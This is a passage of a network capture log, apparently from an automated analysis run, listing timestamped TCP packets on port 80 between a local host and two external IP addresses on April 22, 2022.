Apr 22, 2022 16:15:23.571094036 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.571098089 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.572185040 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.572208881 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.572222948 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.572278976 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.572292089 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.572333097 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.572380066 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.610536098 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.610569954 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.610589027 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.610603094 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.610620022 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.610639095 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.610656977 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.610668898 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.610740900 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.610770941 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.610773087 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.611114025 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.611210108 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.611229897 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.611260891 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.611274004 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.611293077 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.611308098 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.611393929 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.611411095 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.611430883 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.611444950 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.611450911 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.611459017 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.611488104 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.611666918 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.611720085 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.611723900 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.611738920 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.611752033 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.611778021 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.611785889 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.611841917 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.611900091 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.650764942 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.650798082 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.652081966 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.652111053 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.652131081 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.652152061 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.652173996 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.652189970 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.652206898 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.652209997 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.652226925 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.652230978 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.652232885 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.652260065 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.652286053 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.652304888 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.652307987 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.652312994 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.652335882 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.652353048 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.652364969 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.652391911 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.652410030 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.652417898 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.652421951 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.652441025 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.652467966 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.652494907 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.652503967 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.652508974 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.652517080 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.652520895 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.652539015 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.652578115 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.652581930 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.690685034 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.690736055 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.690767050 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.690790892 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.690819979 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.690845966 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.690875053 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.690896988 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.690939903 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.690967083 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.690993071 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.691019058 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.691035986 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.691040993 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.691046953 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.691103935 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.691365004 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.691391945 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.691414118 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.691416025 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.691430092 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.691431999 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.691433907 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.691478968 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.691483974 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.691608906 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.691633940 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.691658974 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.691674948 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.691724062 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.691735029 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.691895962 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.691904068 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.691950083 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.691976070 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.691992998 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.692003012 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.692009926 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.692022085 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:23.692086935 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:23.692112923 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:24.287033081 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:24.310823917 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:24.667445898 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:24.667490005 CEST	80	49750	146.70.35.138	192.168.2.6
Apr 22, 2022 16:15:24.667562962 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:15:24.667589903 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:16:27.920850039 CEST	49750	80	192.168.2.6	146.70.35.138
Apr 22, 2022 16:17:41.196811914 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.267025948 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.267137051 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.267824888 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.338128090 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.338412046 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.338489056 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.338543892 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.338576078 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.338598013 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.338599920 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.338624954 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.338624954 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.338649988 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.338654041 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.338674068 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.338694096 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.338697910 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.338710070 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.338721991 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.338742971 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.338746071 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.338784933 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.408549070 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.408611059 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.408653975 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.408677101 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.408700943 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.408714056 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.408726931 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.408740997 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.408751011 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.408763885 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.408783913 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.408792019 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.408814907 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.408824921 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.408838987 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.408864021 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.408865929 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.408890009 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.408910990 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.408914089 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.408940077 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.408942938 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.408970118 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.408977032 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.408999920 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.409010887 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.409024954 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.409046888 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.409049988 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.409068108 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.409074068 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.409090042 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.409099102 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.409120083 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.409143925 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.478868961 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.478902102 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.478923082 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.478939056 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.478950024 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.478955984 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.478976011 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.478993893 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.479001999 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.479011059 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.479047060 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.479080915 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.479182005 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.479199886 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.479216099 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.479262114 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.479274035 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.479351997 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.479371071 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.479388952 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.479387999 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.479406118 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.479424953 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.479440928 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.479441881 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.479480028 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.479500055 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.479581118 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.479598999 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.479614019 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.479630947 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.479649067 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.479665995 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.479665041 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.479681969 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.479698896 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.479703903 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.479715109 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.479732037 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.479733944 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.479764938 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.479768038 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.479775906 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.479784966 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.479804039 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.479834080 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.479845047 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.479862928 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.479902029 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.479902983 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.479919910 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.479938030 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.479953051 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.479955912 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.479965925 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.479969978 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.479976892 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.479988098 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.480021000 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.480041981 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.549139977 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549179077 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549197912 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549216032 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549233913 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549251080 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549267054 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549284935 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549295902 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.549302101 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549321890 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549346924 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549357891 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.549365044 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549374104 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.549382925 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549396038 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.549400091 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549417973 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549434900 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549437046 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.549452066 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549468994 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549484015 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.549487114 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549509048 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.549515963 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549529076 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.549532890 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549550056 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549566031 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.549566984 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549582958 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549595118 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.549601078 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549618959 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549638987 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549639940 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.549663067 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.549664021 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549683094 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.549683094 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549700975 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549719095 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549726963 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.549735069 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549745083 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.549755096 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549772024 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549789906 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549789906 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.549806118 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549822092 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.549822092 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549845934 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549849033 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.549869061 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.549870014 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549887896 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549904108 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.549905062 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549921989 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549936056 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.549940109 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549957037 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549973965 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.549981117 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.549994946 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550004959 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.550020933 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550028086 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.550039053 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550061941 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550076008 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.550079107 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550096035 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550112009 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550128937 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550141096 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.550144911 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550179958 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550201893 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550211906 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.550223112 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550239086 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:41.550240040 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550257921 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550275087 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:41.550292969 CEST	80	49842	193.56.146.148	192.168.2.6
